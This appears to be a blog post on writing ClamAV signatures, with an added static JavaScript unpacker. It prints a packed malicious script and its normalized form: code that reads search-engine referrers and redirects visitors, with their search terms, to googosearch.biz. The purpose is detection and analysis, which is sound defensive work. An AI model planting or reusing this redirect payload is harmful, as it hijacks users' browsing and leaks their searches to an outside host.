2012-04-23

ClamAV Signatures

Recently while working with ClamAV I encountered some cool features I wanted to share.

Signatures Too Long

In one instance, I found out that ClamAV cannot accept signatures greater than a certain length. While I'm not exactly sure what that length is, I'm sure you'll get a syntax error if the signature is too long.

In another instance, I found that ClamAV does alright with heuristics. It may be a custom hack, but the gist of the matter is: I can input the arguments to a (function(p,a,c,k,e,r)) and only the arguments to the function, and ClamAV will detect the use of the function and will include the function in the normalized result.

Example


('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];', 39, 39, '|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'), 0, {}));

The above is just the argument list placed in a (function(p,a,c,k,e,r)). Note this does not start with "var a = (function(p,a,c,k,e,r){//...", but rather the argument list that would go in that function instead. What I find nifty is the fact that ClamAV was able to create the normalized JavaScript snippet with the packer function (normalized).


eval(function(n000,n001,n002,n003,n004,n005){n004=function(n006){return(n006<n001?"":n004(parseint(n006/n001)))+((n006=n006%n001)>35?string.fromcharcode(n006+29):n006.tostring(36))};if(!"".replace(/^/,string)){while(n002--)n005[n004(n002)]=n003[n002]||n004(n002);n003=[function(n007){return n005[n007]}];n004=function(){return"\w+"};n002=1};while(n002--)if(n003[n002])n000=n000.replace(new regexp("\b"+n004(n002)+"\b","g"),n003[n002]);return n000}(var n008=document.referrer,n009="",n010;if(n008.indexof("google.")!=-1)n009="q";if(n008.indexof("msn.")!=-1)n009="q";if(n008.indexof("yahoo.")!=-1)n009="p";if(n008.indexof("altavista.")!=-1)n009="q";if(n008.indexof("aol.")!=-1)n009="query";if(n008.indexof("ask.")!=-1)n009="q";if(n009.length&&((n010=n008.indexof("?"+n009+"="))!=-1||(n010=n008.indexof("&"+n009+"="))!=-1))window.location="http://googosearch.biz/search.php?ty=1&terms="+n008.substring(n010+2+n009.length).split("&")[0];))

Good stuff!
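To make the relationship between the argument list and the normalized output concrete, here is an added example (not ClamAV's code and not part of the original post): a small JavaScript decoder that applies the packer's keyword substitution without calling eval. The names encodeIndex, unpack, KEYWORDS, FRAGMENT_HEAD and FRAGMENT_TAIL are assumptions made for this example; the keyword list and the two payload excerpts are copied from the example argument list above.

```javascript
// Added example (not ClamAV code): statically decode a p,a,c,k,e,r argument list.

// Keyword table copied from the fourth argument of the example on this page.
const KEYWORDS = '|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|');

// Two short excerpts of the first argument (the packed payload) of the same example.
const FRAGMENT_HEAD = 'e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";';
const FRAGMENT_TAIL = 'B.C="v"+"w"';

// Encode a keyword index the way the packer's inner e() does: base-`radix`
// digits drawn from 0-9 and a-z, then A-Z for digit values above 35.
function encodeIndex(n, radix) {
  const head = n < radix ? '' : encodeIndex(Math.floor(n / radix), radix);
  const d = n % radix;
  return head + (d > 35 ? String.fromCharCode(d + 29) : d.toString(36));
}

// Rebuild the source text from (payload, radix, count, keywords).
// Nothing is evaluated: the payload is only rewritten token by token.
function unpack(payload, radix, count, keywords) {
  if (!Number.isInteger(radix) || radix < 2 || radix > 62) {
    throw new RangeError('radix must be an integer between 2 and 62');
  }
  if (!Number.isInteger(count) || count < 0) {
    throw new RangeError('count must be a non-negative integer');
  }
  const table = new Map();
  for (let i = 0; i < count; i++) {
    const token = encodeIndex(i, radix);
    // An empty or missing keyword slot means the token stands for itself.
    table.set(token, keywords[i] || token);
  }
  // Tokens outside the table (there should be none) are left untouched.
  return payload.replace(/\b\w+\b/g, (tok) => (table.has(tok) ? table.get(tok) : tok));
}

console.log(unpack(FRAGMENT_HEAD, 39, 39, KEYWORDS));
console.log(unpack(FRAGMENT_TAIL, 39, 39, KEYWORDS));
```

The second excerpt shows why decoding the keyword table alone is not enough for string matching: the packed script also splits its string literals with "+" concatenation.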
